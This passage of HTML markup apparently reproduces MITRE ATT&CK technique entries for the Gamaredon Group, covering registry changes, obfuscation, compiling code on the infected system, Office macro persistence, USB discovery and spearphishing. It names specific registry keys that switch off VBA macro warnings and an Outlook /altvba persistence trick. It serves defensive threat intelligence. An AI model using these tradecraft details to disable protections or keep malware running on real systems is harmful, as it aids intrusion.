124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Modify Registry</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has removed security settings for VBA macro execution by changing registry values </span><span style="font-size: 10.5pt; font-family: &quot; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">HKCU\Software\Microsoft\Office\&lt;version&gt;\&lt;product&gt;\Security\VBAWarnings</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> and </span><span style="font-size: 10.5pt; font-family: &quot; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">HKCU\Software\Microsoft\Office\&lt;version&gt;\&lt;product&gt;\Security\AccessVBOM</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[9]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1106"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1106</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1106"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Native API</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> malware has used </span><span style="font-size: 10.5pt; font-family: &quot; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">CreateProcess</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> to launch additional malicious components.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1027"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1027</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1027"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Obfuscated Files or Information</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has delivered self-extracting 7z archive files within malicious document attachments.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1027/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1027/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Binary Padding</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has obfuscated .NET executables by inserting junk code.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1027/004"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.004</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1027/004"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Compile After Delivery</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has compiled the source code for a downloader directly on the infected system using the built-in </span><span style="font-size: 10.5pt; font-family: &quot; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Microsoft.CSharp.CSharpCodeProvider</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> class.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><br></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1027/010"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.010</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1027/010"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Command Obfuscation</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has used obfuscated or encrypted scripts.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[5]</span></a></p></td></tr><tr style="height:56.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1137"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1137</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1137"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Office Application Startup</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has inserted malicious macros into existing documents, providing persistence when they are reopened. </span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has loaded the group's previously delivered VBA project by relaunching Microsoft Outlook with the </span><span style="font-size: 10.5pt; font-family: &quot; color: rgb(28, 34, 38); background-color: rgb(230, 230, 230); font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">/altvba</span><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> option, once the Application.Startup event is received.</span><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:42.75pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td colspan="2" style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1120"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1120</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1120"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Peripheral Device Discovery</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> tools have contained an application to check performance of USB flash drives. </span><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has also used malware to scan for removable drives.</span><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[1]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a></p></td></tr><tr style="height:29.25pt;"><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Enterprise</span></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1566"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">T1566</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1566/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">.001</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/techniques/T1566"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Phishing</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1566/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Spearphishing Attachment</span></a></p></td><td style="border-left:solid #dfdfdf 0.75pt;border-right:solid #dfdfdf 0.75pt;border-bottom:solid #dfdfdf 0.75pt;border-top:solid #dfdfdf 0.75pt;vertical-align:top;padding:8pt 8pt 8pt 8pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.38;margin-top:0pt;margin-bottom:0pt;"><a href="https://attack.mitre.org/groups/G0047"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Gamaredon Group</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;"> has delivered spearphishing emails with malicious attachments to targets.</span><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[2]</span></a><a href="https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">[3]</span></a><a href="https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(79, 